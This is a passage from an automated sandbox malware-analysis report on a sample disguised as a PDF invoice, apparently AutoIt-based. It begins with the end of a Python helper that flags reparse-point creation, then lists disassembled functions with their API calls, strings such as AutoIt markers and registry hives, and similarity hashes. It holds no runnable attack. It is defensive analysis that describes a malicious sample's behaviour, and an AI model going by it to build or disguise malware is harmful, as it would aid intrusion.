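    0x000900A4: "FSCTL_SET_REPARSE_POINT",
    0x000900A8: "FSCTL_GET_REPARSE_POINT",
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",
}

# One "Api.MODULE(arg,...), ref: ADDR" entry as rendered in this report
# (format assumed from the listing; '?' marks arguments not known statically).
LINE_RE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),"
                     r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_api_line(line: str) -> Optional[dict]:
    """Split one call-site line into api, module, numeric args (None for '?'), ref."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        # Negative values such as -00000001 are rendered signed; mask to 32 bits.
        args.append(None if raw in ("", "?") else int(raw, 16) & 0xFFFFFFFF)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref")}


def decode_bits(value: int, table: dict) -> list:
    """Name every known bit in a mask; any leftover bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    rest = value & ~known & 0xFFFFFFFF
    if rest:
        names.append(hex(rest))
    return names


def decode_ioctl(code: int) -> dict:
    """Invert CTL_CODE(DeviceType, Function, Method, Access) from winioctl.h."""
    device, function, method = (code >> 16) & 0xFFFF, (code >> 2) & 0xFFF, code & 0x3
    return {"code": code, "name": KNOWN_FSCTL.get(code, "unknown"),
            "device_type": DEVICE_TYPES.get(device, hex(device)),
            "function": function, "method": METHODS[method],
            "access": (code >> 14) & 0x3}


def explain_call(call: dict) -> dict:
    """Decode the arguments that matter for the reparse-point pattern."""
    api, args = call["api"], call["args"]
    if api == "CreateFileW" and len(args) >= 6 and None not in (args[1], args[4], args[5]):
        return {"api": api,
                "desired_access": decode_bits(args[1], GENERIC_ACCESS),
                "disposition": CREATE_DISPOSITION.get(args[4], "unknown"),
                "flags": decode_bits(args[5], FILE_FLAGS)}
    if api == "DeviceIoControl" and len(args) >= 2 and args[1] is not None:
        return {"api": api, "ioctl": decode_ioctl(args[1])}
    return {"api": api}


def sets_reparse_point(lines: list) -> bool:
    """True when a writable directory handle (backup semantics) is opened and
    FSCTL_SET_REPARSE_POINT is then issued: the junction/symlink creation pattern."""
    opened_dir = False
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        info = explain_call(call)
        if info["api"] == "CreateFileW" and "GENERIC_WRITE" in info.get("desired_access", []) \
                and "FILE_FLAG_BACKUP_SEMANTICS" in info.get("flags", []):
            opened_dir = True
        elif info["api"] == "DeviceIoControl" and opened_dir \
                and info.get("ioctl", {}).get("name") == "FSCTL_SET_REPARSE_POINT":
            return True
    return False


# Call sites copied from the function listing above (the report's own lines).
REPORT_LINES = [
    "• CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA4D9",
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA4FE",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA58E",
    "• RemoveDirectoryW.KERNEL32(?), ref: 007BA5A2",
]

if __name__ == "__main__":
    for entry in REPORT_LINES:
        print(explain_call(parse_api_line(entry)))
    print("reparse point set on a directory handle:", sets_reparse_point(REPORT_LINES))
```

The same sequence (directory handle opened with backup semantics, then FSCTL_SET_REPARSE_POINT) is what a legitimate mklink /J produces, so on its own it is not an indicator; what makes it worth noting in a malware report is where the target path in the "\??\%s" buffer points, which the static listing cannot tell you and which the dynamic file-system trace can.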
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
• String ID:
• API String ID: 884005220-0
• Opcode ID: 3388f37ff00667aec9d97607f970c3d92c95446f3c87af35e57c98e822911fc9
• Instruction ID: 69c508369cfff11cc2d5fa7aa2efd9392460dab6716227546227309652e36bee
• Opcode Fuzzy Hash: 3388f37ff00667aec9d97607f970c3d92c95446f3c87af35e57c98e822911fc9
• Instruction Fuzzy Hash: 1461E4B2A80301FFFB206F24D849B697BA9EF11361F14811BE815DB191EB3D9841C7A2
APIs
• __wsplitpath.LIBCMT ref: 007BDC7B
• _wcscat.LIBCMT ref: 007BDC93
• _wcscat.LIBCMT ref: 007BDCA5
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007BDCBA
• SetCurrentDirectoryW.KERNEL32(?), ref: 007BDCCE
• GetFileAttributesW.KERNEL32(?), ref: 007BDCE6
• SetFileAttributesW.KERNEL32(?,00000000), ref: 007BDD00
• SetCurrentDirectoryW.KERNEL32(?), ref: 007BDD12
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
• Instruction ID: 10236f58b22e865524a930ea0bffd234cfa1b7aa801403e7c21d0ad300ebd4cc
• Opcode Fuzzy Hash: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
• Instruction Fuzzy Hash: B2816EB16042419FCB34DF64C845AEBB7E8BB88310F19882AF889C7251F678ED45CB52
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DC4EC
• GetFocus.USER32 ref: 007DC4FC
• GetDlgCtrlID.USER32(00000000), ref: 007DC507
• _memset.LIBCMT ref: 007DC632
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007DC65D
• GetMenuItemCount.USER32(?), ref: 007DC67D
• GetMenuItemID.USER32(?,00000000), ref: 007DC690
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007DC6C4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007DC70C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DC744
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007DC779
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 50f01759cc6a2627f041feb44a3a94e8714c517eb5b858784743be7277942eac
• Instruction ID: 27de6a99f1002f07cce8533be1a90319b1d23759b4c4341f981da33bbdbe7a1b
• Opcode Fuzzy Hash: 50f01759cc6a2627f041feb44a3a94e8714c517eb5b858784743be7277942eac
• Instruction Fuzzy Hash: 42817D702083029FD711CF14D984AAABBF8FF88364F14452EF99697391D778E915CBA2
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                                                                                                                        • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                                                                                                                        • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                                                                                                                        • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                                                                                                                        • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                                                                                                                        • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                                                                                                                        • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A8458
                                                                                                                      • _memset.LIBCMT ref: 007A846D
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A848C
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A849D
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 007A84DA
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A84F6
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A8513
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8522
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 007A8529
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A854A
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 007A8551
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8582
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A85A8
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A85BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                                                                                                                      • Instruction ID: e0af3210518d0ca78817d357786a58909e8c6939788d2110f6f4354563fc9d1e
                                                                                                                      • Opcode Fuzzy Hash: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                                                                                                                      • Instruction Fuzzy Hash: B2614C71900209EBDF44DF94DC45AAEBBB9FF45300F04826AF815A7291DB399A25CF61
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 007C76A2
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C76AE
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 007C76BA
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 007C76C7
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C771B
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7757
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007C777B
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 007C7783
                                                                                                                      • DeleteObject.GDI32(?), ref: 007C778C
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 007C7793
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 007C779E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: 89f16f40524aaa71a0370cf34ecf7c7a0b66e4cdee3f4902b1ea60c0bb522036
                                                                                                                      • Instruction ID: b3614256bf291b747c1f0184ff52214dd706cae0265d9baa997120161b5836fc
                                                                                                                      • Opcode Fuzzy Hash: 89f16f40524aaa71a0370cf34ecf7c7a0b66e4cdee3f4902b1ea60c0bb522036
                                                                                                                      • Instruction Fuzzy Hash: 98511975904209EFCB15CFA8CC85EAEBBB9EF48710F14C52EE95AA7210D635A940CB64
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00756C6C,?,00008000), ref: 00770BB7
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00756E5A
                                                                                                                        • Part of subcall function 007559CD: _wcscpy.LIBCMT ref: 00755A05
                                                                                                                        • Part of subcall function 0077387D: _iswctype.LIBCMT ref: 00773885
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                      • Opcode ID: add1d7bf6f15724092f52b4dee4b7a1eeb3a644cf4665c8871cc8eb76fed3c52
                                                                                                                      • Instruction ID: 9239c05e2fe13333701ce700d7bd836d7ba83b836f74fc69fda7e89d5f3c1059
                                                                                                                      • Opcode Fuzzy Hash: add1d7bf6f15724092f52b4dee4b7a1eeb3a644cf4665c8871cc8eb76fed3c52
                                                                                                                      • Instruction Fuzzy Hash: BA02CD71108340DFC724EF24C895AAFBBE5BF88354F44491DF88A932A1DB78E949CB52
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007545F9
                                                                                                                      • GetMenuItemCount.USER32(00816890), ref: 0078D7CD
                                                                                                                      • GetMenuItemCount.USER32(00816890), ref: 0078D87D
                                                                                                                      • GetCursorPos.USER32(?), ref: 0078D8C1
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0078D8CA
                                                                                                                      • TrackPopupMenuEx.USER32(00816890,00000000,?,00000000,00000000,00000000), ref: 0078D8DD
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0078D8E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2751501086-0
                                                                                                                      • Opcode ID: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                                                                                                                      • Instruction ID: 7cd754ed6b35dc6b4844eeb7e91eb3d36f1e19f66a0671aa032bad9f8317c987
                                                                                                                      • Opcode Fuzzy Hash: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                                                                                                                      • Instruction Fuzzy Hash: C4714630681205BEEB309F24DC49FEABF65FF04368F244216F925A61E1C7B96C60DB94
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C8BEC
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007C8C19
                                                                                                                      • CoUninitialize.OLE32 ref: 007C8C23
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 007C8D23
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 007C8E50
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007E2C0C), ref: 007C8E84
                                                                                                                      • CoGetObject.OLE32(?,00000000,007E2C0C,?), ref: 007C8EA7
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 007C8EBA
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C8F3A
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C8F4A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID: ,,~
                                                                                                                      • API String ID: 2395222682-1083855107
                                                                                                                      • Opcode ID: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                                                                                                                      • Instruction ID: 01d299d548d6c5a4786b559b14785818bc7fd9747a79c466d26a0dd40b9e559d
                                                                                                                      • Opcode Fuzzy Hash: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                                                                                                                      • Instruction Fuzzy Hash: D1C134B1608305EFC740DF24C884E6AB7E9BF89348F00496DF98A9B251DB75ED05CB62
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                      • Opcode ID: 6d8b6fd503f77954de2a0fd4d60241689cb27af5eb2700faca9bdac2acbd658f
                                                                                                                      • Instruction ID: 4e436fa7cc51ca61a602a2a7f15de7bfb0c52615e7e7477464fdb72afd33622d
                                                                                                                      • Opcode Fuzzy Hash: 6d8b6fd503f77954de2a0fd4d60241689cb27af5eb2700faca9bdac2acbd658f
                                                                                                                      • Instruction Fuzzy Hash: 9F414D3025024EDBCF20EFA0DC95AEA3734FF15340F908455FD959B292DB79A95ACBA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                        • Part of subcall function 00757A84: _memmove.LIBCMT ref: 00757B0D
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B55D2
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B55E8
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B55F9
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B560B
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B561C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                      • Opcode ID: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                                                                                                                      • Instruction ID: 8eaf4428a8d9c1057cce06ac70a7ef8da00c0f33fa8da1670df14a3c9ac2a75f
                                                                                                                      • Opcode Fuzzy Hash: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                                                                                                                      • Instruction Fuzzy Hash: A5118220A50269B9E728A675DC4AEFFBB7CFF95F01F400469B811E21D1EEA81D09C5A1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                      • Opcode ID: aecf8f15b30f530d04c4eaebbf6410e1fca64cc8e1de0316ad1412f202e6a440
                                                                                                                      • Instruction ID: e90cff8d363b4489c2c07fd58f9fc008c22421eb22405aa41a0046911c78a3bf
                                                                                                                      • Opcode Fuzzy Hash: aecf8f15b30f530d04c4eaebbf6410e1fca64cc8e1de0316ad1412f202e6a440
                                                                                                                      • Instruction Fuzzy Hash: 2911D232904115EBCB24AB249C0AFDB77BCDB01760F0481B6F44996192EF7CAA819B61
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 007B521C
                                                                                                                        • Part of subcall function 00770719: timeGetTime.WINMM(?,75C0B400,00760FF9), ref: 0077071D
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 007B5248
                                                                                                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 007B526C
                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007B528E
                                                                                                                      • SetActiveWindow.USER32 ref: 007B52AD
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B52BB
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B52DA
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 007B52E5
                                                                                                                      • IsWindow.USER32 ref: 007B52F1
                                                                                                                      • EndDialog.USER32(00000000), ref: 007B5302
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
